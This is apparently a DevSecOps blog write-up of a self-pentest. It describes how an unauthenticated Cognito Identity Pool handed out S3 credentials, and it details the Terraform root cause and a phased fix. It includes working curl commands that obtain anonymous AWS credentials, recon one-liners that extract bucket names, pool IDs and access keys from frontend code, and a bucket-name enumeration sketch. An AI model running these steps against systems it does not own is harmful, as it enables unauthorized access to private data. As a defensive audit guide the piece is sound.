How Two curl Commands Gave Me Full Access to an S3 Bucket
A routine API pentest revealed that AWS Cognito Identity Pools were handing out S3 credentials to anyone on the internet. Here is how I found it, what I got wrong along the way, and the step-by-step fix.
I wasn’t looking for this. I was halfway through a routine pentest on a payment form — checking for XSS, poking at validation — when I stumbled into something much worse. Two curl commands later, I was staring at 2.4 GB of confidential files in an S3 bucket. No login. No password. No API key.
This is a write-up from that test. The project names and bucket identifiers have been changed, but the commands, the responses, and — importantly — the mistakes are all real.
If your frontend uploads files to S3 using Cognito Identity Pools, you might want to sit down for this one.
A Little Background
I’m a DevOps engineer. Infrastructure, CI/CD pipelines, Terraform — that’s been my world. But lately I’ve been moving into DevSecOps because in a world where AI can generate exploit scripts in seconds, someone on the team needs to be thinking about security full-time.
So I started pentesting our own APIs. Not with Burp Suite or some enterprise scanner — just curl, a terminal, and the kind of paranoia you develop after reading too many breach reports at 2 AM.
The Discovery
I was testing a public form that accepts payments. Standard stuff — check if the email field validates properly, try some XSS payloads, see if I can manipulate prices. During this, I opened the browser dev tools to watch network requests, and I noticed something interesting.
The frontend wasn’t uploading files through the API. It was uploading them directly to S3. And to do that, it was getting temporary AWS credentials from somewhere.
I dug into the frontend JavaScript and found this:
```javascript
import { fromCognitoIdentityPool } from '@aws-sdk/credential-provider-cognito-identity'

const credentials = fromCognitoIdentityPool({
  client: cognitoClient,
  identityPoolId: 'us-east-1:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx',
})
```
A Cognito Identity Pool ID. Hardcoded in the frontend. Visible to literally anyone who right-clicks and says “View Source.”
Now, that’s not a vulnerability by itself — Cognito Identity Pools are designed to work from the frontend. But it made me curious. The kind of curious that leads to either a boring “it’s fine” or a very interesting Slack message to the team. The question was: what permissions does the anonymous role have?
Two curl Commands to Full Access
Here’s the thing about Cognito Identity Pools that keeps security folks up at night. If allow_unauthenticated_identities is set to true (and it is more often than you’d think), anyone can get temporary AWS credentials. No account needed. No login. Nothing. Just ask nicely.
Step 1 — Get an anonymous identity:
```shell
curl -s -X POST "https://cognito-identity.us-east-1.amazonaws.com/" \
  -H "Content-Type: application/x-amz-json-1.1" \
  -H "X-Amz-Target: AWSCognitoIdentityService.GetId" \
  -d '{"IdentityPoolId":"us-east-1:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"}'
```
Response:
```json
{"IdentityId":"us-east-1:yyyyyyyy-yyyy-yyyy-yyyy-yyyyyyyyyyyy"}
```
AWS just gave me an identity. I didn’t prove who I am. I didn’t even say my name.
Step 2 — Exchange that identity for real AWS credentials:
```shell
curl -s -X POST "https://cognito-identity.us-east-1.amazonaws.com/" \
  -H "Content-Type: application/x-amz-json-1.1" \
  -H "X-Amz-Target: AWSCognitoIdentityService.GetCredentialsForIdentity" \
  -d '{"IdentityId":"us-east-1:yyyyyyyy-yyyy-yyyy-yyyy-yyyyyyyyyyyy"}'
```
Response:
```json
{
  "Credentials": {
    "AccessKeyId": "ASIAXXXXXXXXXXX",
    "SecretKey": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
    "SessionToken": "very-long-token-here...",
    "Expiration": 1776675435.0
  }
}
```
That’s it. Real, working AWS credentials. I exported them and ran:
```shell
export AWS_ACCESS_KEY_ID="ASIAXXXXXXXXXXX"
export AWS_SECRET_ACCESS_KEY="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
export AWS_SESSION_TOKEN="very-long-token-here..."
export AWS_DEFAULT_REGION=us-east-1

aws s3 ls s3://my-app-uploads-bucket/
```
And I saw everything:
```text
PRE submissions/
PRE documents/
PRE press/
PRE events/
PRE signatures/
PRE media/
```
150 files. 2.4 GB. Confidential submissions, signed documents, internal materials. All accessible without logging in.
My coffee went cold. I forgot about the XSS test I was running.
It Wasn’t Just Read Access
At this point I was hoping the damage was limited to reading. Spoiler: it wasn’t.
I tested write access:
```shell
echo "pentest" | aws s3 cp - s3://my-app-uploads-bucket/pentest-proof.txt
```
It worked. I could upload arbitrary files. I immediately deleted my test file.
Then I tested delete:
```shell
aws s3 rm s3://my-app-uploads-bucket/pentest-proof.txt
```
Also worked.
Let that sink in for a moment. Anyone on the internet — no account, no login, no API key — could download every confidential file, upload malware that admins would open, or just nuke the entire bucket. Two curl commands. A rainy Tuesday afternoon. That’s all it would take.
The Accidental Discovery: You Don’t Even Need Cognito
Here’s the part I wasn’t expecting. While digging into the bucket configurations, I discovered something that made the Cognito issue almost irrelevant for the frontend buckets.
I tried this — no AWS credentials at all, just plain curl:
```shell
curl -s "https://my-app-frontend.s3.amazonaws.com/?list-type=2&max-keys=5"
```
And got back:
```xml
<ListBucketResult>
  <Name>my-app-frontend</Name>
  <Contents>
    <Key>_nuxt/app-chunk-abc123.js</Key>
    <Size>124532</Size>
    <LastModified>2026-04-17T09:52:54.000Z</LastModified>
  </Contents>
  <Contents>
    <Key>_nuxt/vendor-chunk-def456.js</Key>
    ...
  </Contents>
</ListBucketResult>
```
Wait. That’s a full directory listing. Every file name, every file size, every last-modified timestamp. No credentials. No Cognito. No nothing. Just an HTTP GET to the S3 URL with ?list-type=2.
How? The bucket had acl = "public-read", which grants the s3:ListBucket permission to the AllUsers group — literally everyone on the internet. The bucket was behaving like an open FTP server from 1998.
I checked the other public buckets. Same thing. Six buckets total — three in production, three in staging — all happily serving directory listings to anyone who asked.
Why This Is Worse Than It Sounds
An attacker doesn’t need to guess file names. They can just ask the bucket for a complete inventory. But it gets worse.
Search engines index these listings. Google, Bing, and specialized tools like GrayhatWarfare actively crawl and index open S3 buckets. GrayhatWarfare maintains a searchable database of publicly accessible S3 buckets — you can search by filename, keyword, or file extension. If your bucket is publicly listable, there’s a good chance it’s already been indexed and catalogued.
In 2025, researchers confirmed that nearly half of all AWS S3 buckets were potentially misconfigured, with many publicly accessible due to default settings. More than half of analyzed buckets contained sensitive or personally identifiable information.
Tools like S3Scanner, Slurp, and bucket-finder automate the discovery of open buckets by trying common naming patterns. If your company is called “acme-corp,” they’ll try acme-corp, acme-corp-staging, acme-corp-uploads, acme-corp-backups — and when they find one that responds with ListBucketResult instead of AccessDenied, they know they’ve hit gold.
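To make the pattern concrete, here is a tiny Python sketch of that permutation step. The suffix list is illustrative only, not what any particular tool actually uses:

```python
# Sketch of the bucket-name permutation step used by open-bucket scanners.
# The suffix list is illustrative, not exhaustive.
SUFFIXES = ["", "-staging", "-uploads", "-backups", "-assets", "-logs"]

def candidate_buckets(company: str) -> list[str]:
    """Generate likely S3 bucket names for a company name."""
    base = company.lower().replace(" ", "-")
    return [f"{base}{suffix}" for suffix in SUFFIXES]

print(candidate_buckets("acme-corp"))
# A real scanner would then GET https://<name>.s3.amazonaws.com/
# and flag any response containing <ListBucketResult>.
```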
The Fix: DenyPublicListBucket
The fix was straightforward. Add a deny statement to all six bucket policies that blocks listing for anyone outside our AWS account:
```hcl
{
  Sid       = "DenyPublicListBucket"
  Effect    = "Deny"
  Principal = "*"
  Action = [
    "s3:ListBucket",
    "s3:ListBucketVersions",
    "s3:ListBucketMultipartUploads"
  ]
  Resource = aws_s3_bucket.my_bucket.arn
  Condition = {
    StringNotEquals = {
      "aws:PrincipalAccount" = data.aws_caller_identity.current.account_id
    }
  }
}
```
The aws:PrincipalAccount condition is the key. It says: “deny listing for everyone except principals from our own AWS account.” CloudFront, CodeBuild, and internal services still work. Random people on the internet and search engine crawlers get AccessDenied.
I applied this to all six buckets — three production, three staging — in one PR. After deploying:
```shell
# Before: full directory listing
curl -s "https://my-app-frontend.s3.amazonaws.com/?list-type=2"
# <ListBucketResult>...<Key>index.html</Key>...440 objects...</ListBucketResult>

# After: access denied
curl -s "https://my-app-frontend.s3.amazonaws.com/?list-type=2"
# <Error><Code>AccessDenied</Code><Message>Access Denied</Message></Error>
```
Note that individual files are still accessible if you know the exact URL (the bucket is still public-read for GetObject). But you can no longer enumerate the contents. An attacker would have to guess exact file names instead of getting a free inventory.
Add this to your checklist: run curl -s "https://YOUR-BUCKET.s3.amazonaws.com/?list-type=2" against every public bucket you own. If you get XML back instead of AccessDenied, your file inventory is public.
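If you own more than a couple of buckets, that check is easy to script. Here is a stdlib-only Python sketch; the check_bucket helper and the classification logic are my own, and it simply looks for the ListBucketResult element that S3 returns on a successful listing:

```python
import urllib.request
import urllib.error

def is_listable(body: str) -> bool:
    """A successful S3 listing contains <ListBucketResult>; AccessDenied does not."""
    return "<ListBucketResult" in body

def check_bucket(name: str) -> bool:
    """Return True if the bucket serves a public directory listing (live request)."""
    url = f"https://{name}.s3.amazonaws.com/?list-type=2&max-keys=1"
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return is_listable(resp.read().decode())
    except urllib.error.HTTPError as err:  # 403 AccessDenied arrives here
        return is_listable(err.read().decode())

# Usage (makes a live request):
#   check_bucket("my-app-frontend")  -> True if publicly listable
```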
How I Found the Bucket Names
OK so I had one bucket. But the paranoia had kicked in fully now. What else could these credentials reach? First problem: how do you find bucket names?
Turns out, they were practically waving at me from multiple places.
The frontend JavaScript told me.
The browser needs the bucket name to upload via the AWS SDK, so it’s baked into the production JavaScript bundle. You don’t need to dig through minified code — just grep for AWS-specific patterns:
```shell
# S3 bucket URLs
curl -s "https://my-app.example.com/" | grep -oE "[a-z0-9.-]+\.s3[a-z0-9.-]*\.amazonaws\.com"

# Cognito Identity Pool IDs
curl -s "https://my-app.example.com/" | grep -oE "us-east-1:[a-f0-9-]{36}"

# Any AWS endpoint
curl -s "https://my-app.example.com/" | grep -oE "[a-z0-9-]+\.amazonaws\.com"

# Hardcoded AWS access keys (you'd be surprised)
curl -s "https://my-app.example.com/" | grep -oE "AKIA[A-Z0-9]{16}"
```
The Cognito Identity Pool ID and the bucket name both showed up.
CloudFront error pages leaked the S3 origin.
```shell
curl -sI "https://my-app.example.com/nonexistent-12345" | grep -iE "x-amz|server.*amazon|x-cache"
```
Response: server: AmazonS3 and x-amz-error-code: NoSuchKey. That confirms S3 is behind CloudFront, and the bucket naming convention becomes guessable.
The S3 REST API confirmed bucket existence.
```shell
curl -sI "https://my-app-frontend-staging.s3.amazonaws.com/"
```
AWS returned x-amz-bucket-arn: arn:aws:s3:::my-app-frontend-staging. Thanks, AWS. Very helpful. No credentials needed — just ask and they’ll tell you the full ARN of the bucket.
The S3 website endpoint was directly accessible.
```shell
curl -sI "http://my-app-frontend-staging.s3-website-us-east-1.amazonaws.com/"
# HTTP/1.1 200 OK — the full website, bypassing CloudFront entirely
```
The Frontend Bucket — Where I Embarrassed Myself
This is the part of the story where I look a bit silly. But I’m including it because if I made this mistake, others will too.
With the frontend bucket name confirmed, I tested it with Cognito credentials:
```shell
aws s3 ls s3://my-app-frontend-bucket/
```

```text
PRE _nuxt/
PRE admin/
PRE login/
index.html
```
440 files. The entire website. I could list and download everything.
Then I tested write access:
```shell
echo "test" | aws s3 cp - s3://my-app-frontend-bucket/test.txt
# AccessDenied: not authorized to perform s3:PutObject
# because no identity-based policy allows the s3:PutObject action
```
Denied. Wait, what? I initially assumed I could write to it — same account, same credentials, public bucket, all the vibes of “this should work.” But AWS IAM had other plans.
Here’s what I learned: AWS denies by default. Within the same account, an action succeeds only if at least one applicable policy (the IAM policy on the role or the bucket policy on the bucket) explicitly allows it, and nothing explicitly denies it. The Cognito IAM policy only grants PutObject on the uploads bucket. It doesn’t mention the frontend bucket at all. The bucket policy says “anyone can read” (Principal: *, GetObject), but a read grant is not a write grant. No policy allowed the write, so it fell through to the implicit deny.
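As a toy model of that evaluation order (my own simplification — real AWS evaluation also involves SCPs, permission boundaries, and session policies), in Python:

```python
def evaluate(action: str, iam_allows: set[str], bucket_allows: set[str],
             explicit_denies: set[str]) -> str:
    """Toy model of same-account S3 policy evaluation:
    explicit deny wins, then any single allow suffices, else implicit deny."""
    if action in explicit_denies:
        return "DENY (explicit)"
    if action in iam_allows or action in bucket_allows:
        return "ALLOW"
    return "DENY (implicit - no policy allows it)"

# The frontend bucket from the story: bucket policy grants public reads,
# the Cognito role grants nothing on this bucket.
iam = set()                # Cognito role: no actions on the frontend bucket
bucket = {"s3:GetObject"}  # bucket policy: Principal "*" can read

print(evaluate("s3:GetObject", iam, bucket, set()))  # prints ALLOW
print(evaluate("s3:PutObject", iam, bucket, set()))  # prints DENY (implicit - no policy allows it)
```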
Here’s where it gets embarrassing. I had already written in my report — with great confidence and dramatic formatting — that the frontend bucket was fully writable. “Website defacement risk. CRITICAL.” I had used the --dryrun flag to “confirm” it. Sent the report. Felt like a security hero.
Then I went back to verify with actual commands. AccessDenied.
The --dryrun flag checks client-side logic. It does not actually talk to AWS IAM. It’s like checking if a door looks locked from across the street and writing “confirmed: door is locked” in your report. Go turn the handle.
To make things worse, I then spent an hour adding explicit deny statements to the frontend bucket policy. Tested them. Felt good about the “defense-in-depth.” Then realized the deny statements were doing nothing — IAM was already blocking the action without them. I had built a fence next to a wall.
Don’t add security controls for problems that don’t exist. It just adds complexity and makes the next person think there’s a vulnerability where there isn’t one.
The real damage was the uploads bucket — that one had full read/write/delete, confirmed with actual operations.
“But We Have CloudFront!”
Yeah, about that. Here’s something people get wrong: CloudFront is not a security boundary unless you configure it to be one.
In this case, CloudFront was set up as a “custom origin” — it accessed S3 via the website endpoint over HTTP, the same way any browser does. The bucket had Principal: * in its policy. CloudFront was just a CDN in front of a public bucket.
For CloudFront to actually protect S3:
- Use an S3 origin (not a custom/website origin)
- Enable Origin Access Control (OAC) — CloudFront signs requests with SigV4
- Remove Principal: * from the bucket policy
- Block public access on the bucket
Without all four, the bucket is publicly readable. The good news: AWS IAM still blocked writes from Cognito. But anyone who knows the bucket name can read everything.
The Root Cause (It’s One Line)
Brace yourself. The entire vulnerability came down to one line in a Terraform file:
```hcl
resource "aws_cognito_identity_pool" "my_identity_pool" {
  identity_pool_name               = "my identity pool"
  allow_unauthenticated_identities = true # <-- This right here
}
```
That single line says: “give AWS credentials to anyone who asks, even if they haven’t logged in.”
And the IAM role attached to unauthenticated users had:
```hcl
actions = [
  "s3:PutObject",    # Upload anything
  "s3:GetObject",    # Download anything
  "s3:DeleteObject", # Delete anything
  "s3:ListBucket",   # List everything
]
resources = ["arn:aws:s3:::my-app-uploads-bucket/*"]
```
The developer set this up so the frontend could upload files directly to S3 — a perfectly reasonable pattern, used by thousands of apps. But the anonymous role got the same permissions as an authenticated user. And nobody ever reviewed it.
The Terraform code had been there for over a year. Sitting in version control. Passing CI. Deploying to production. Working perfectly. And completely exploitable the entire time.
How I Fixed It (Without Breaking Anything)
When you find something like this, the temptation is to go full panic mode and change everything at once. Don’t. I’ve seen “emergency security fixes” that took down production because someone didn’t think through the blast radius.
Instead, I broke it into phases. Each one was a separate PR that could be deployed and rolled back independently.
Phase 0: Stop the bleeding (30 minutes, one coffee)
The fastest fix that makes the biggest difference. Remove GetObject and DeleteObject from the Cognito guest role:
```hcl
actions = [
  "s3:PutObject",
  "s3:AbortMultipartUpload",
  "s3:ListMultipartUploadParts",
]
```
Anonymous download and deletion stopped immediately. Uploads still work — the frontend needs them.
Phase 1: Scope uploads per user (1 hour)
Each Cognito identity gets a unique ID. Use it to restrict uploads to a per-user prefix:
```hcl
resources = [
  "arn:aws:s3:::my-app-uploads-bucket/uploads/${cognito-identity.amazonaws.com:sub}/*"
]
```
Now user A can only upload to uploads/user-a-id/ and user B to uploads/user-b-id/. No cross-user access.
The frontend needs a one-line change:
```javascript
const key = `uploads/${credentials.identityId}/submissions/$(unknown)`;
```
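If a backend also builds keys, it is worth normalizing the filename so a crafted value can't smuggle path segments into the key. A hypothetical Python helper (IAM already pins uploads to the identity's prefix, so this is just hygiene that keeps object keys flat and predictable):

```python
import posixpath
import re

def upload_key(identity_id: str, filename: str) -> str:
    """Build a per-identity S3 key under uploads/<identityId>/ (hypothetical helper).
    Drops directory components and unusual characters from the filename."""
    base = posixpath.basename(filename)           # strip any path components
    safe = re.sub(r"[^A-Za-z0-9._-]", "_", base)  # conservative whitelist
    return f"uploads/{identity_id}/{safe}"

print(upload_key("us-east-1:aaaa-bbbb", "report.pdf"))
# prints uploads/us-east-1:aaaa-bbbb/report.pdf
print(upload_key("us-east-1:aaaa-bbbb", "../../etc/passwd"))
# prints uploads/us-east-1:aaaa-bbbb/passwd
```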
Phase 2: The real fix — presigned URLs
The long-term solution is to stop sending AWS credentials to the browser entirely. Instead, the backend generates short-lived presigned URLs:
```text
Browser → POST /api/upload/request (with JWT auth)
Backend → Validates user, file type, file size
Backend → Generates presigned PUT URL (expires in 15 minutes)
Browser → PUT directly to S3 using the presigned URL
```
The backend controls everything. The browser never sees an AWS access key. After this migration, set allow_unauthenticated_identities = false and the original vulnerability becomes literally impossible. No more two-curl-command nightmares.
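In practice the backend would use the SDK's presigner (generate_presigned_url in boto3), but there is no magic in it. Here is a stdlib-only Python sketch of SigV4 query-string presigning, under simplifying assumptions of my own (virtual-hosted-style URL, host as the only signed header, unsigned payload — the SDK handles the edge cases this skips):

```python
import datetime
import hashlib
import hmac
import urllib.parse

def presign_put_url(bucket: str, key: str, access_key: str, secret_key: str,
                    region: str = "us-east-1", expires: int = 900) -> str:
    """Sketch of a SigV4 query-string-presigned PUT URL.
    For production, prefer the SDK's built-in presigner."""
    host = f"{bucket}.s3.{region}.amazonaws.com"
    path = "/" + urllib.parse.quote(key)  # keep "/" separators in the key
    now = datetime.datetime.now(datetime.timezone.utc)
    amz_date = now.strftime("%Y%m%dT%H%M%SZ")
    datestamp = now.strftime("%Y%m%d")
    scope = f"{datestamp}/{region}/s3/aws4_request"

    params = {
        "X-Amz-Algorithm": "AWS4-HMAC-SHA256",
        "X-Amz-Credential": f"{access_key}/{scope}",
        "X-Amz-Date": amz_date,
        "X-Amz-Expires": str(expires),
        "X-Amz-SignedHeaders": "host",
    }
    query = "&".join(f"{k}={urllib.parse.quote(v, safe='')}"
                     for k, v in sorted(params.items()))
    canonical_request = "\n".join(
        ["PUT", path, query, f"host:{host}\n", "host", "UNSIGNED-PAYLOAD"])
    string_to_sign = "\n".join(
        ["AWS4-HMAC-SHA256", amz_date, scope,
         hashlib.sha256(canonical_request.encode()).hexdigest()])

    def _sign(k: bytes, msg: str) -> bytes:
        return hmac.new(k, msg.encode(), hashlib.sha256).digest()

    # Derive the signing key: date -> region -> service -> "aws4_request"
    k = _sign(b"AWS4" + secret_key.encode(), datestamp)
    for part in (region, "s3", "aws4_request"):
        k = _sign(k, part)
    signature = hmac.new(k, string_to_sign.encode(), hashlib.sha256).hexdigest()
    return f"https://{host}{path}?{query}&X-Amz-Signature={signature}"
```

The browser then does a plain HTTP PUT to the returned URL before it expires; no AWS credentials ever leave the backend.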
The Part That Kept Me Up at Night
I fixed the vulnerability in about 30 minutes. The part that wouldn’t leave my head was how long it had been there.
Over a year. The Terraform code. The Identity Pool ID in the frontend JavaScript. Sitting there in plain sight. Nobody noticed because:
- It worked. Files uploaded correctly. The frontend team was happy.
- Security reviews focused on the API. Nobody checked the AWS IAM policies.
- Cognito is confusing. Even experienced AWS engineers mix up User Pools and Identity Pools.
- The bucket wasn’t “public.” block_public_access was set on the uploads bucket. But Cognito credentials aren’t “public” — they’re authenticated AWS credentials that happen to be available to everyone.
This is the gap that DevSecOps fills. The developers wrote correct application code. The infrastructure team deployed it correctly. But nobody looked at the intersection — the IAM policy that connected the two.
What I Learned
1. “It’s just for uploads” is the most dangerous sentence in cloud security.
Every time someone says this at a standup, somewhere a Cognito Identity Pool gets s3:* permissions and nobody audits it for a year.
2. Cognito Identity Pools are powerful but easy to misconfigure.
allow_unauthenticated_identities = true means “hand out AWS credentials to anyone on the internet.” If you need this, scope the permissions to upload-only, to a specific prefix, with content-type restrictions.
3. Test your own infrastructure with curl.
I didn’t use any fancy pentesting tools. Just curl and the AWS CLI. Total cost: $0. Time to find a critical vulnerability: about 20 minutes. If I can get credentials with two HTTP requests, so can a bored teenager on a Saturday night.
4. Understand how AWS evaluates permissions.
AWS denies by default: an action succeeds only if at least one applicable policy (the IAM policy on the role or the bucket policy on the bucket) explicitly allows it, and nothing explicitly denies it. If neither policy grants a write on a bucket, writes are blocked — even if the bucket is publicly readable. Don’t add explicit deny statements where the action is already implicitly denied. It adds complexity without adding security.
5. Never trust --dryrun for security testing.
I cannot stress this enough. The --dryrun flag checks client-side logic. It does not talk to IAM. I used it to “confirm” a CRITICAL vulnerability that turned out to be a false positive. I wrote it up. I sent it to the team. Then I tested for real and had to sheepishly correct my own report. Turn the handle. Don’t just look at the door.
6. The fix doesn’t have to be perfect on day one.
I deployed Phase 0 in 30 minutes. That immediately stopped the worst-case scenario. The full fix (presigned URLs) took a week. Incremental security is real security.
Your Turn
Seriously, do this right now. Open a terminal. If your frontend uploads files to S3 using Cognito, run through this checklist:
- Is allow_unauthenticated_identities set to true? Do you actually need it?
- Does the guest IAM role have GetObject or DeleteObject? Remove them.
- Is ListBucket scoped to a prefix, or can guests list the entire bucket?
- Is PutObject scoped to a per-identity prefix using ${cognito-identity.amazonaws.com:sub}?
- Does the Cognito IAM policy mention your frontend bucket? It shouldn’t — and make sure no bucket policy grants writes either, because AWS only allows an action if some policy explicitly allows it.
- Can you discover your own bucket names from the frontend?
```shell
curl -s "https://your-site.com/" | grep -oE "[a-z0-9.-]+\.s3[a-z0-9.-]*\.amazonaws\.com"
curl -s "https://your-site.com/" | grep -oE "us-east-1:[a-f0-9-]{36}"
curl -sI "https://your-site.com/nonexistent" | grep -iE "x-amz|server.*amazon"
```
If any of those return results, an attacker already knows your bucket names and Cognito pool IDs. They probably found them before you did.
- Are your public buckets listing their contents? Test every public bucket:
```shell
curl -s "https://YOUR-BUCKET.s3.amazonaws.com/?list-type=2" | head -20
```
If you get <ListBucketResult> instead of AccessDenied, anyone on the internet (and search engines like GrayhatWarfare) can enumerate every file you have.
- Do you have CloudTrail data events enabled for S3 object operations?
- Do you have a CloudWatch alarm for excessive Cognito credential issuance?
The DevOps to DevSecOps Shift
This whole experience is why I’m moving from DevOps to DevSecOps. Not because it’s trending. Not because it looks good on LinkedIn. Because I looked at a Terraform file that had been in production for a year and realized nobody had ever asked “what can an anonymous user actually do with this?”
In the age of AI, the attack surface is expanding faster than any team can manually review. An AI can scan your frontend JavaScript, extract the Cognito Identity Pool ID, and test every permission in seconds. The window between “vulnerability introduced” and “vulnerability exploited” is shrinking to hours.
The infrastructure that “just works” might also “just expose everything.” Someone on every team needs to be the person who asks “what happens if I call this without logging in?” and then actually tries it.
That person is increasingly me. And honestly? I’ve never enjoyed my job more. There’s something deeply satisfying about breaking into your own systems, fixing the hole, and knowing you found it before someone else did.
Now go run those grep commands against your own site. I’ll wait.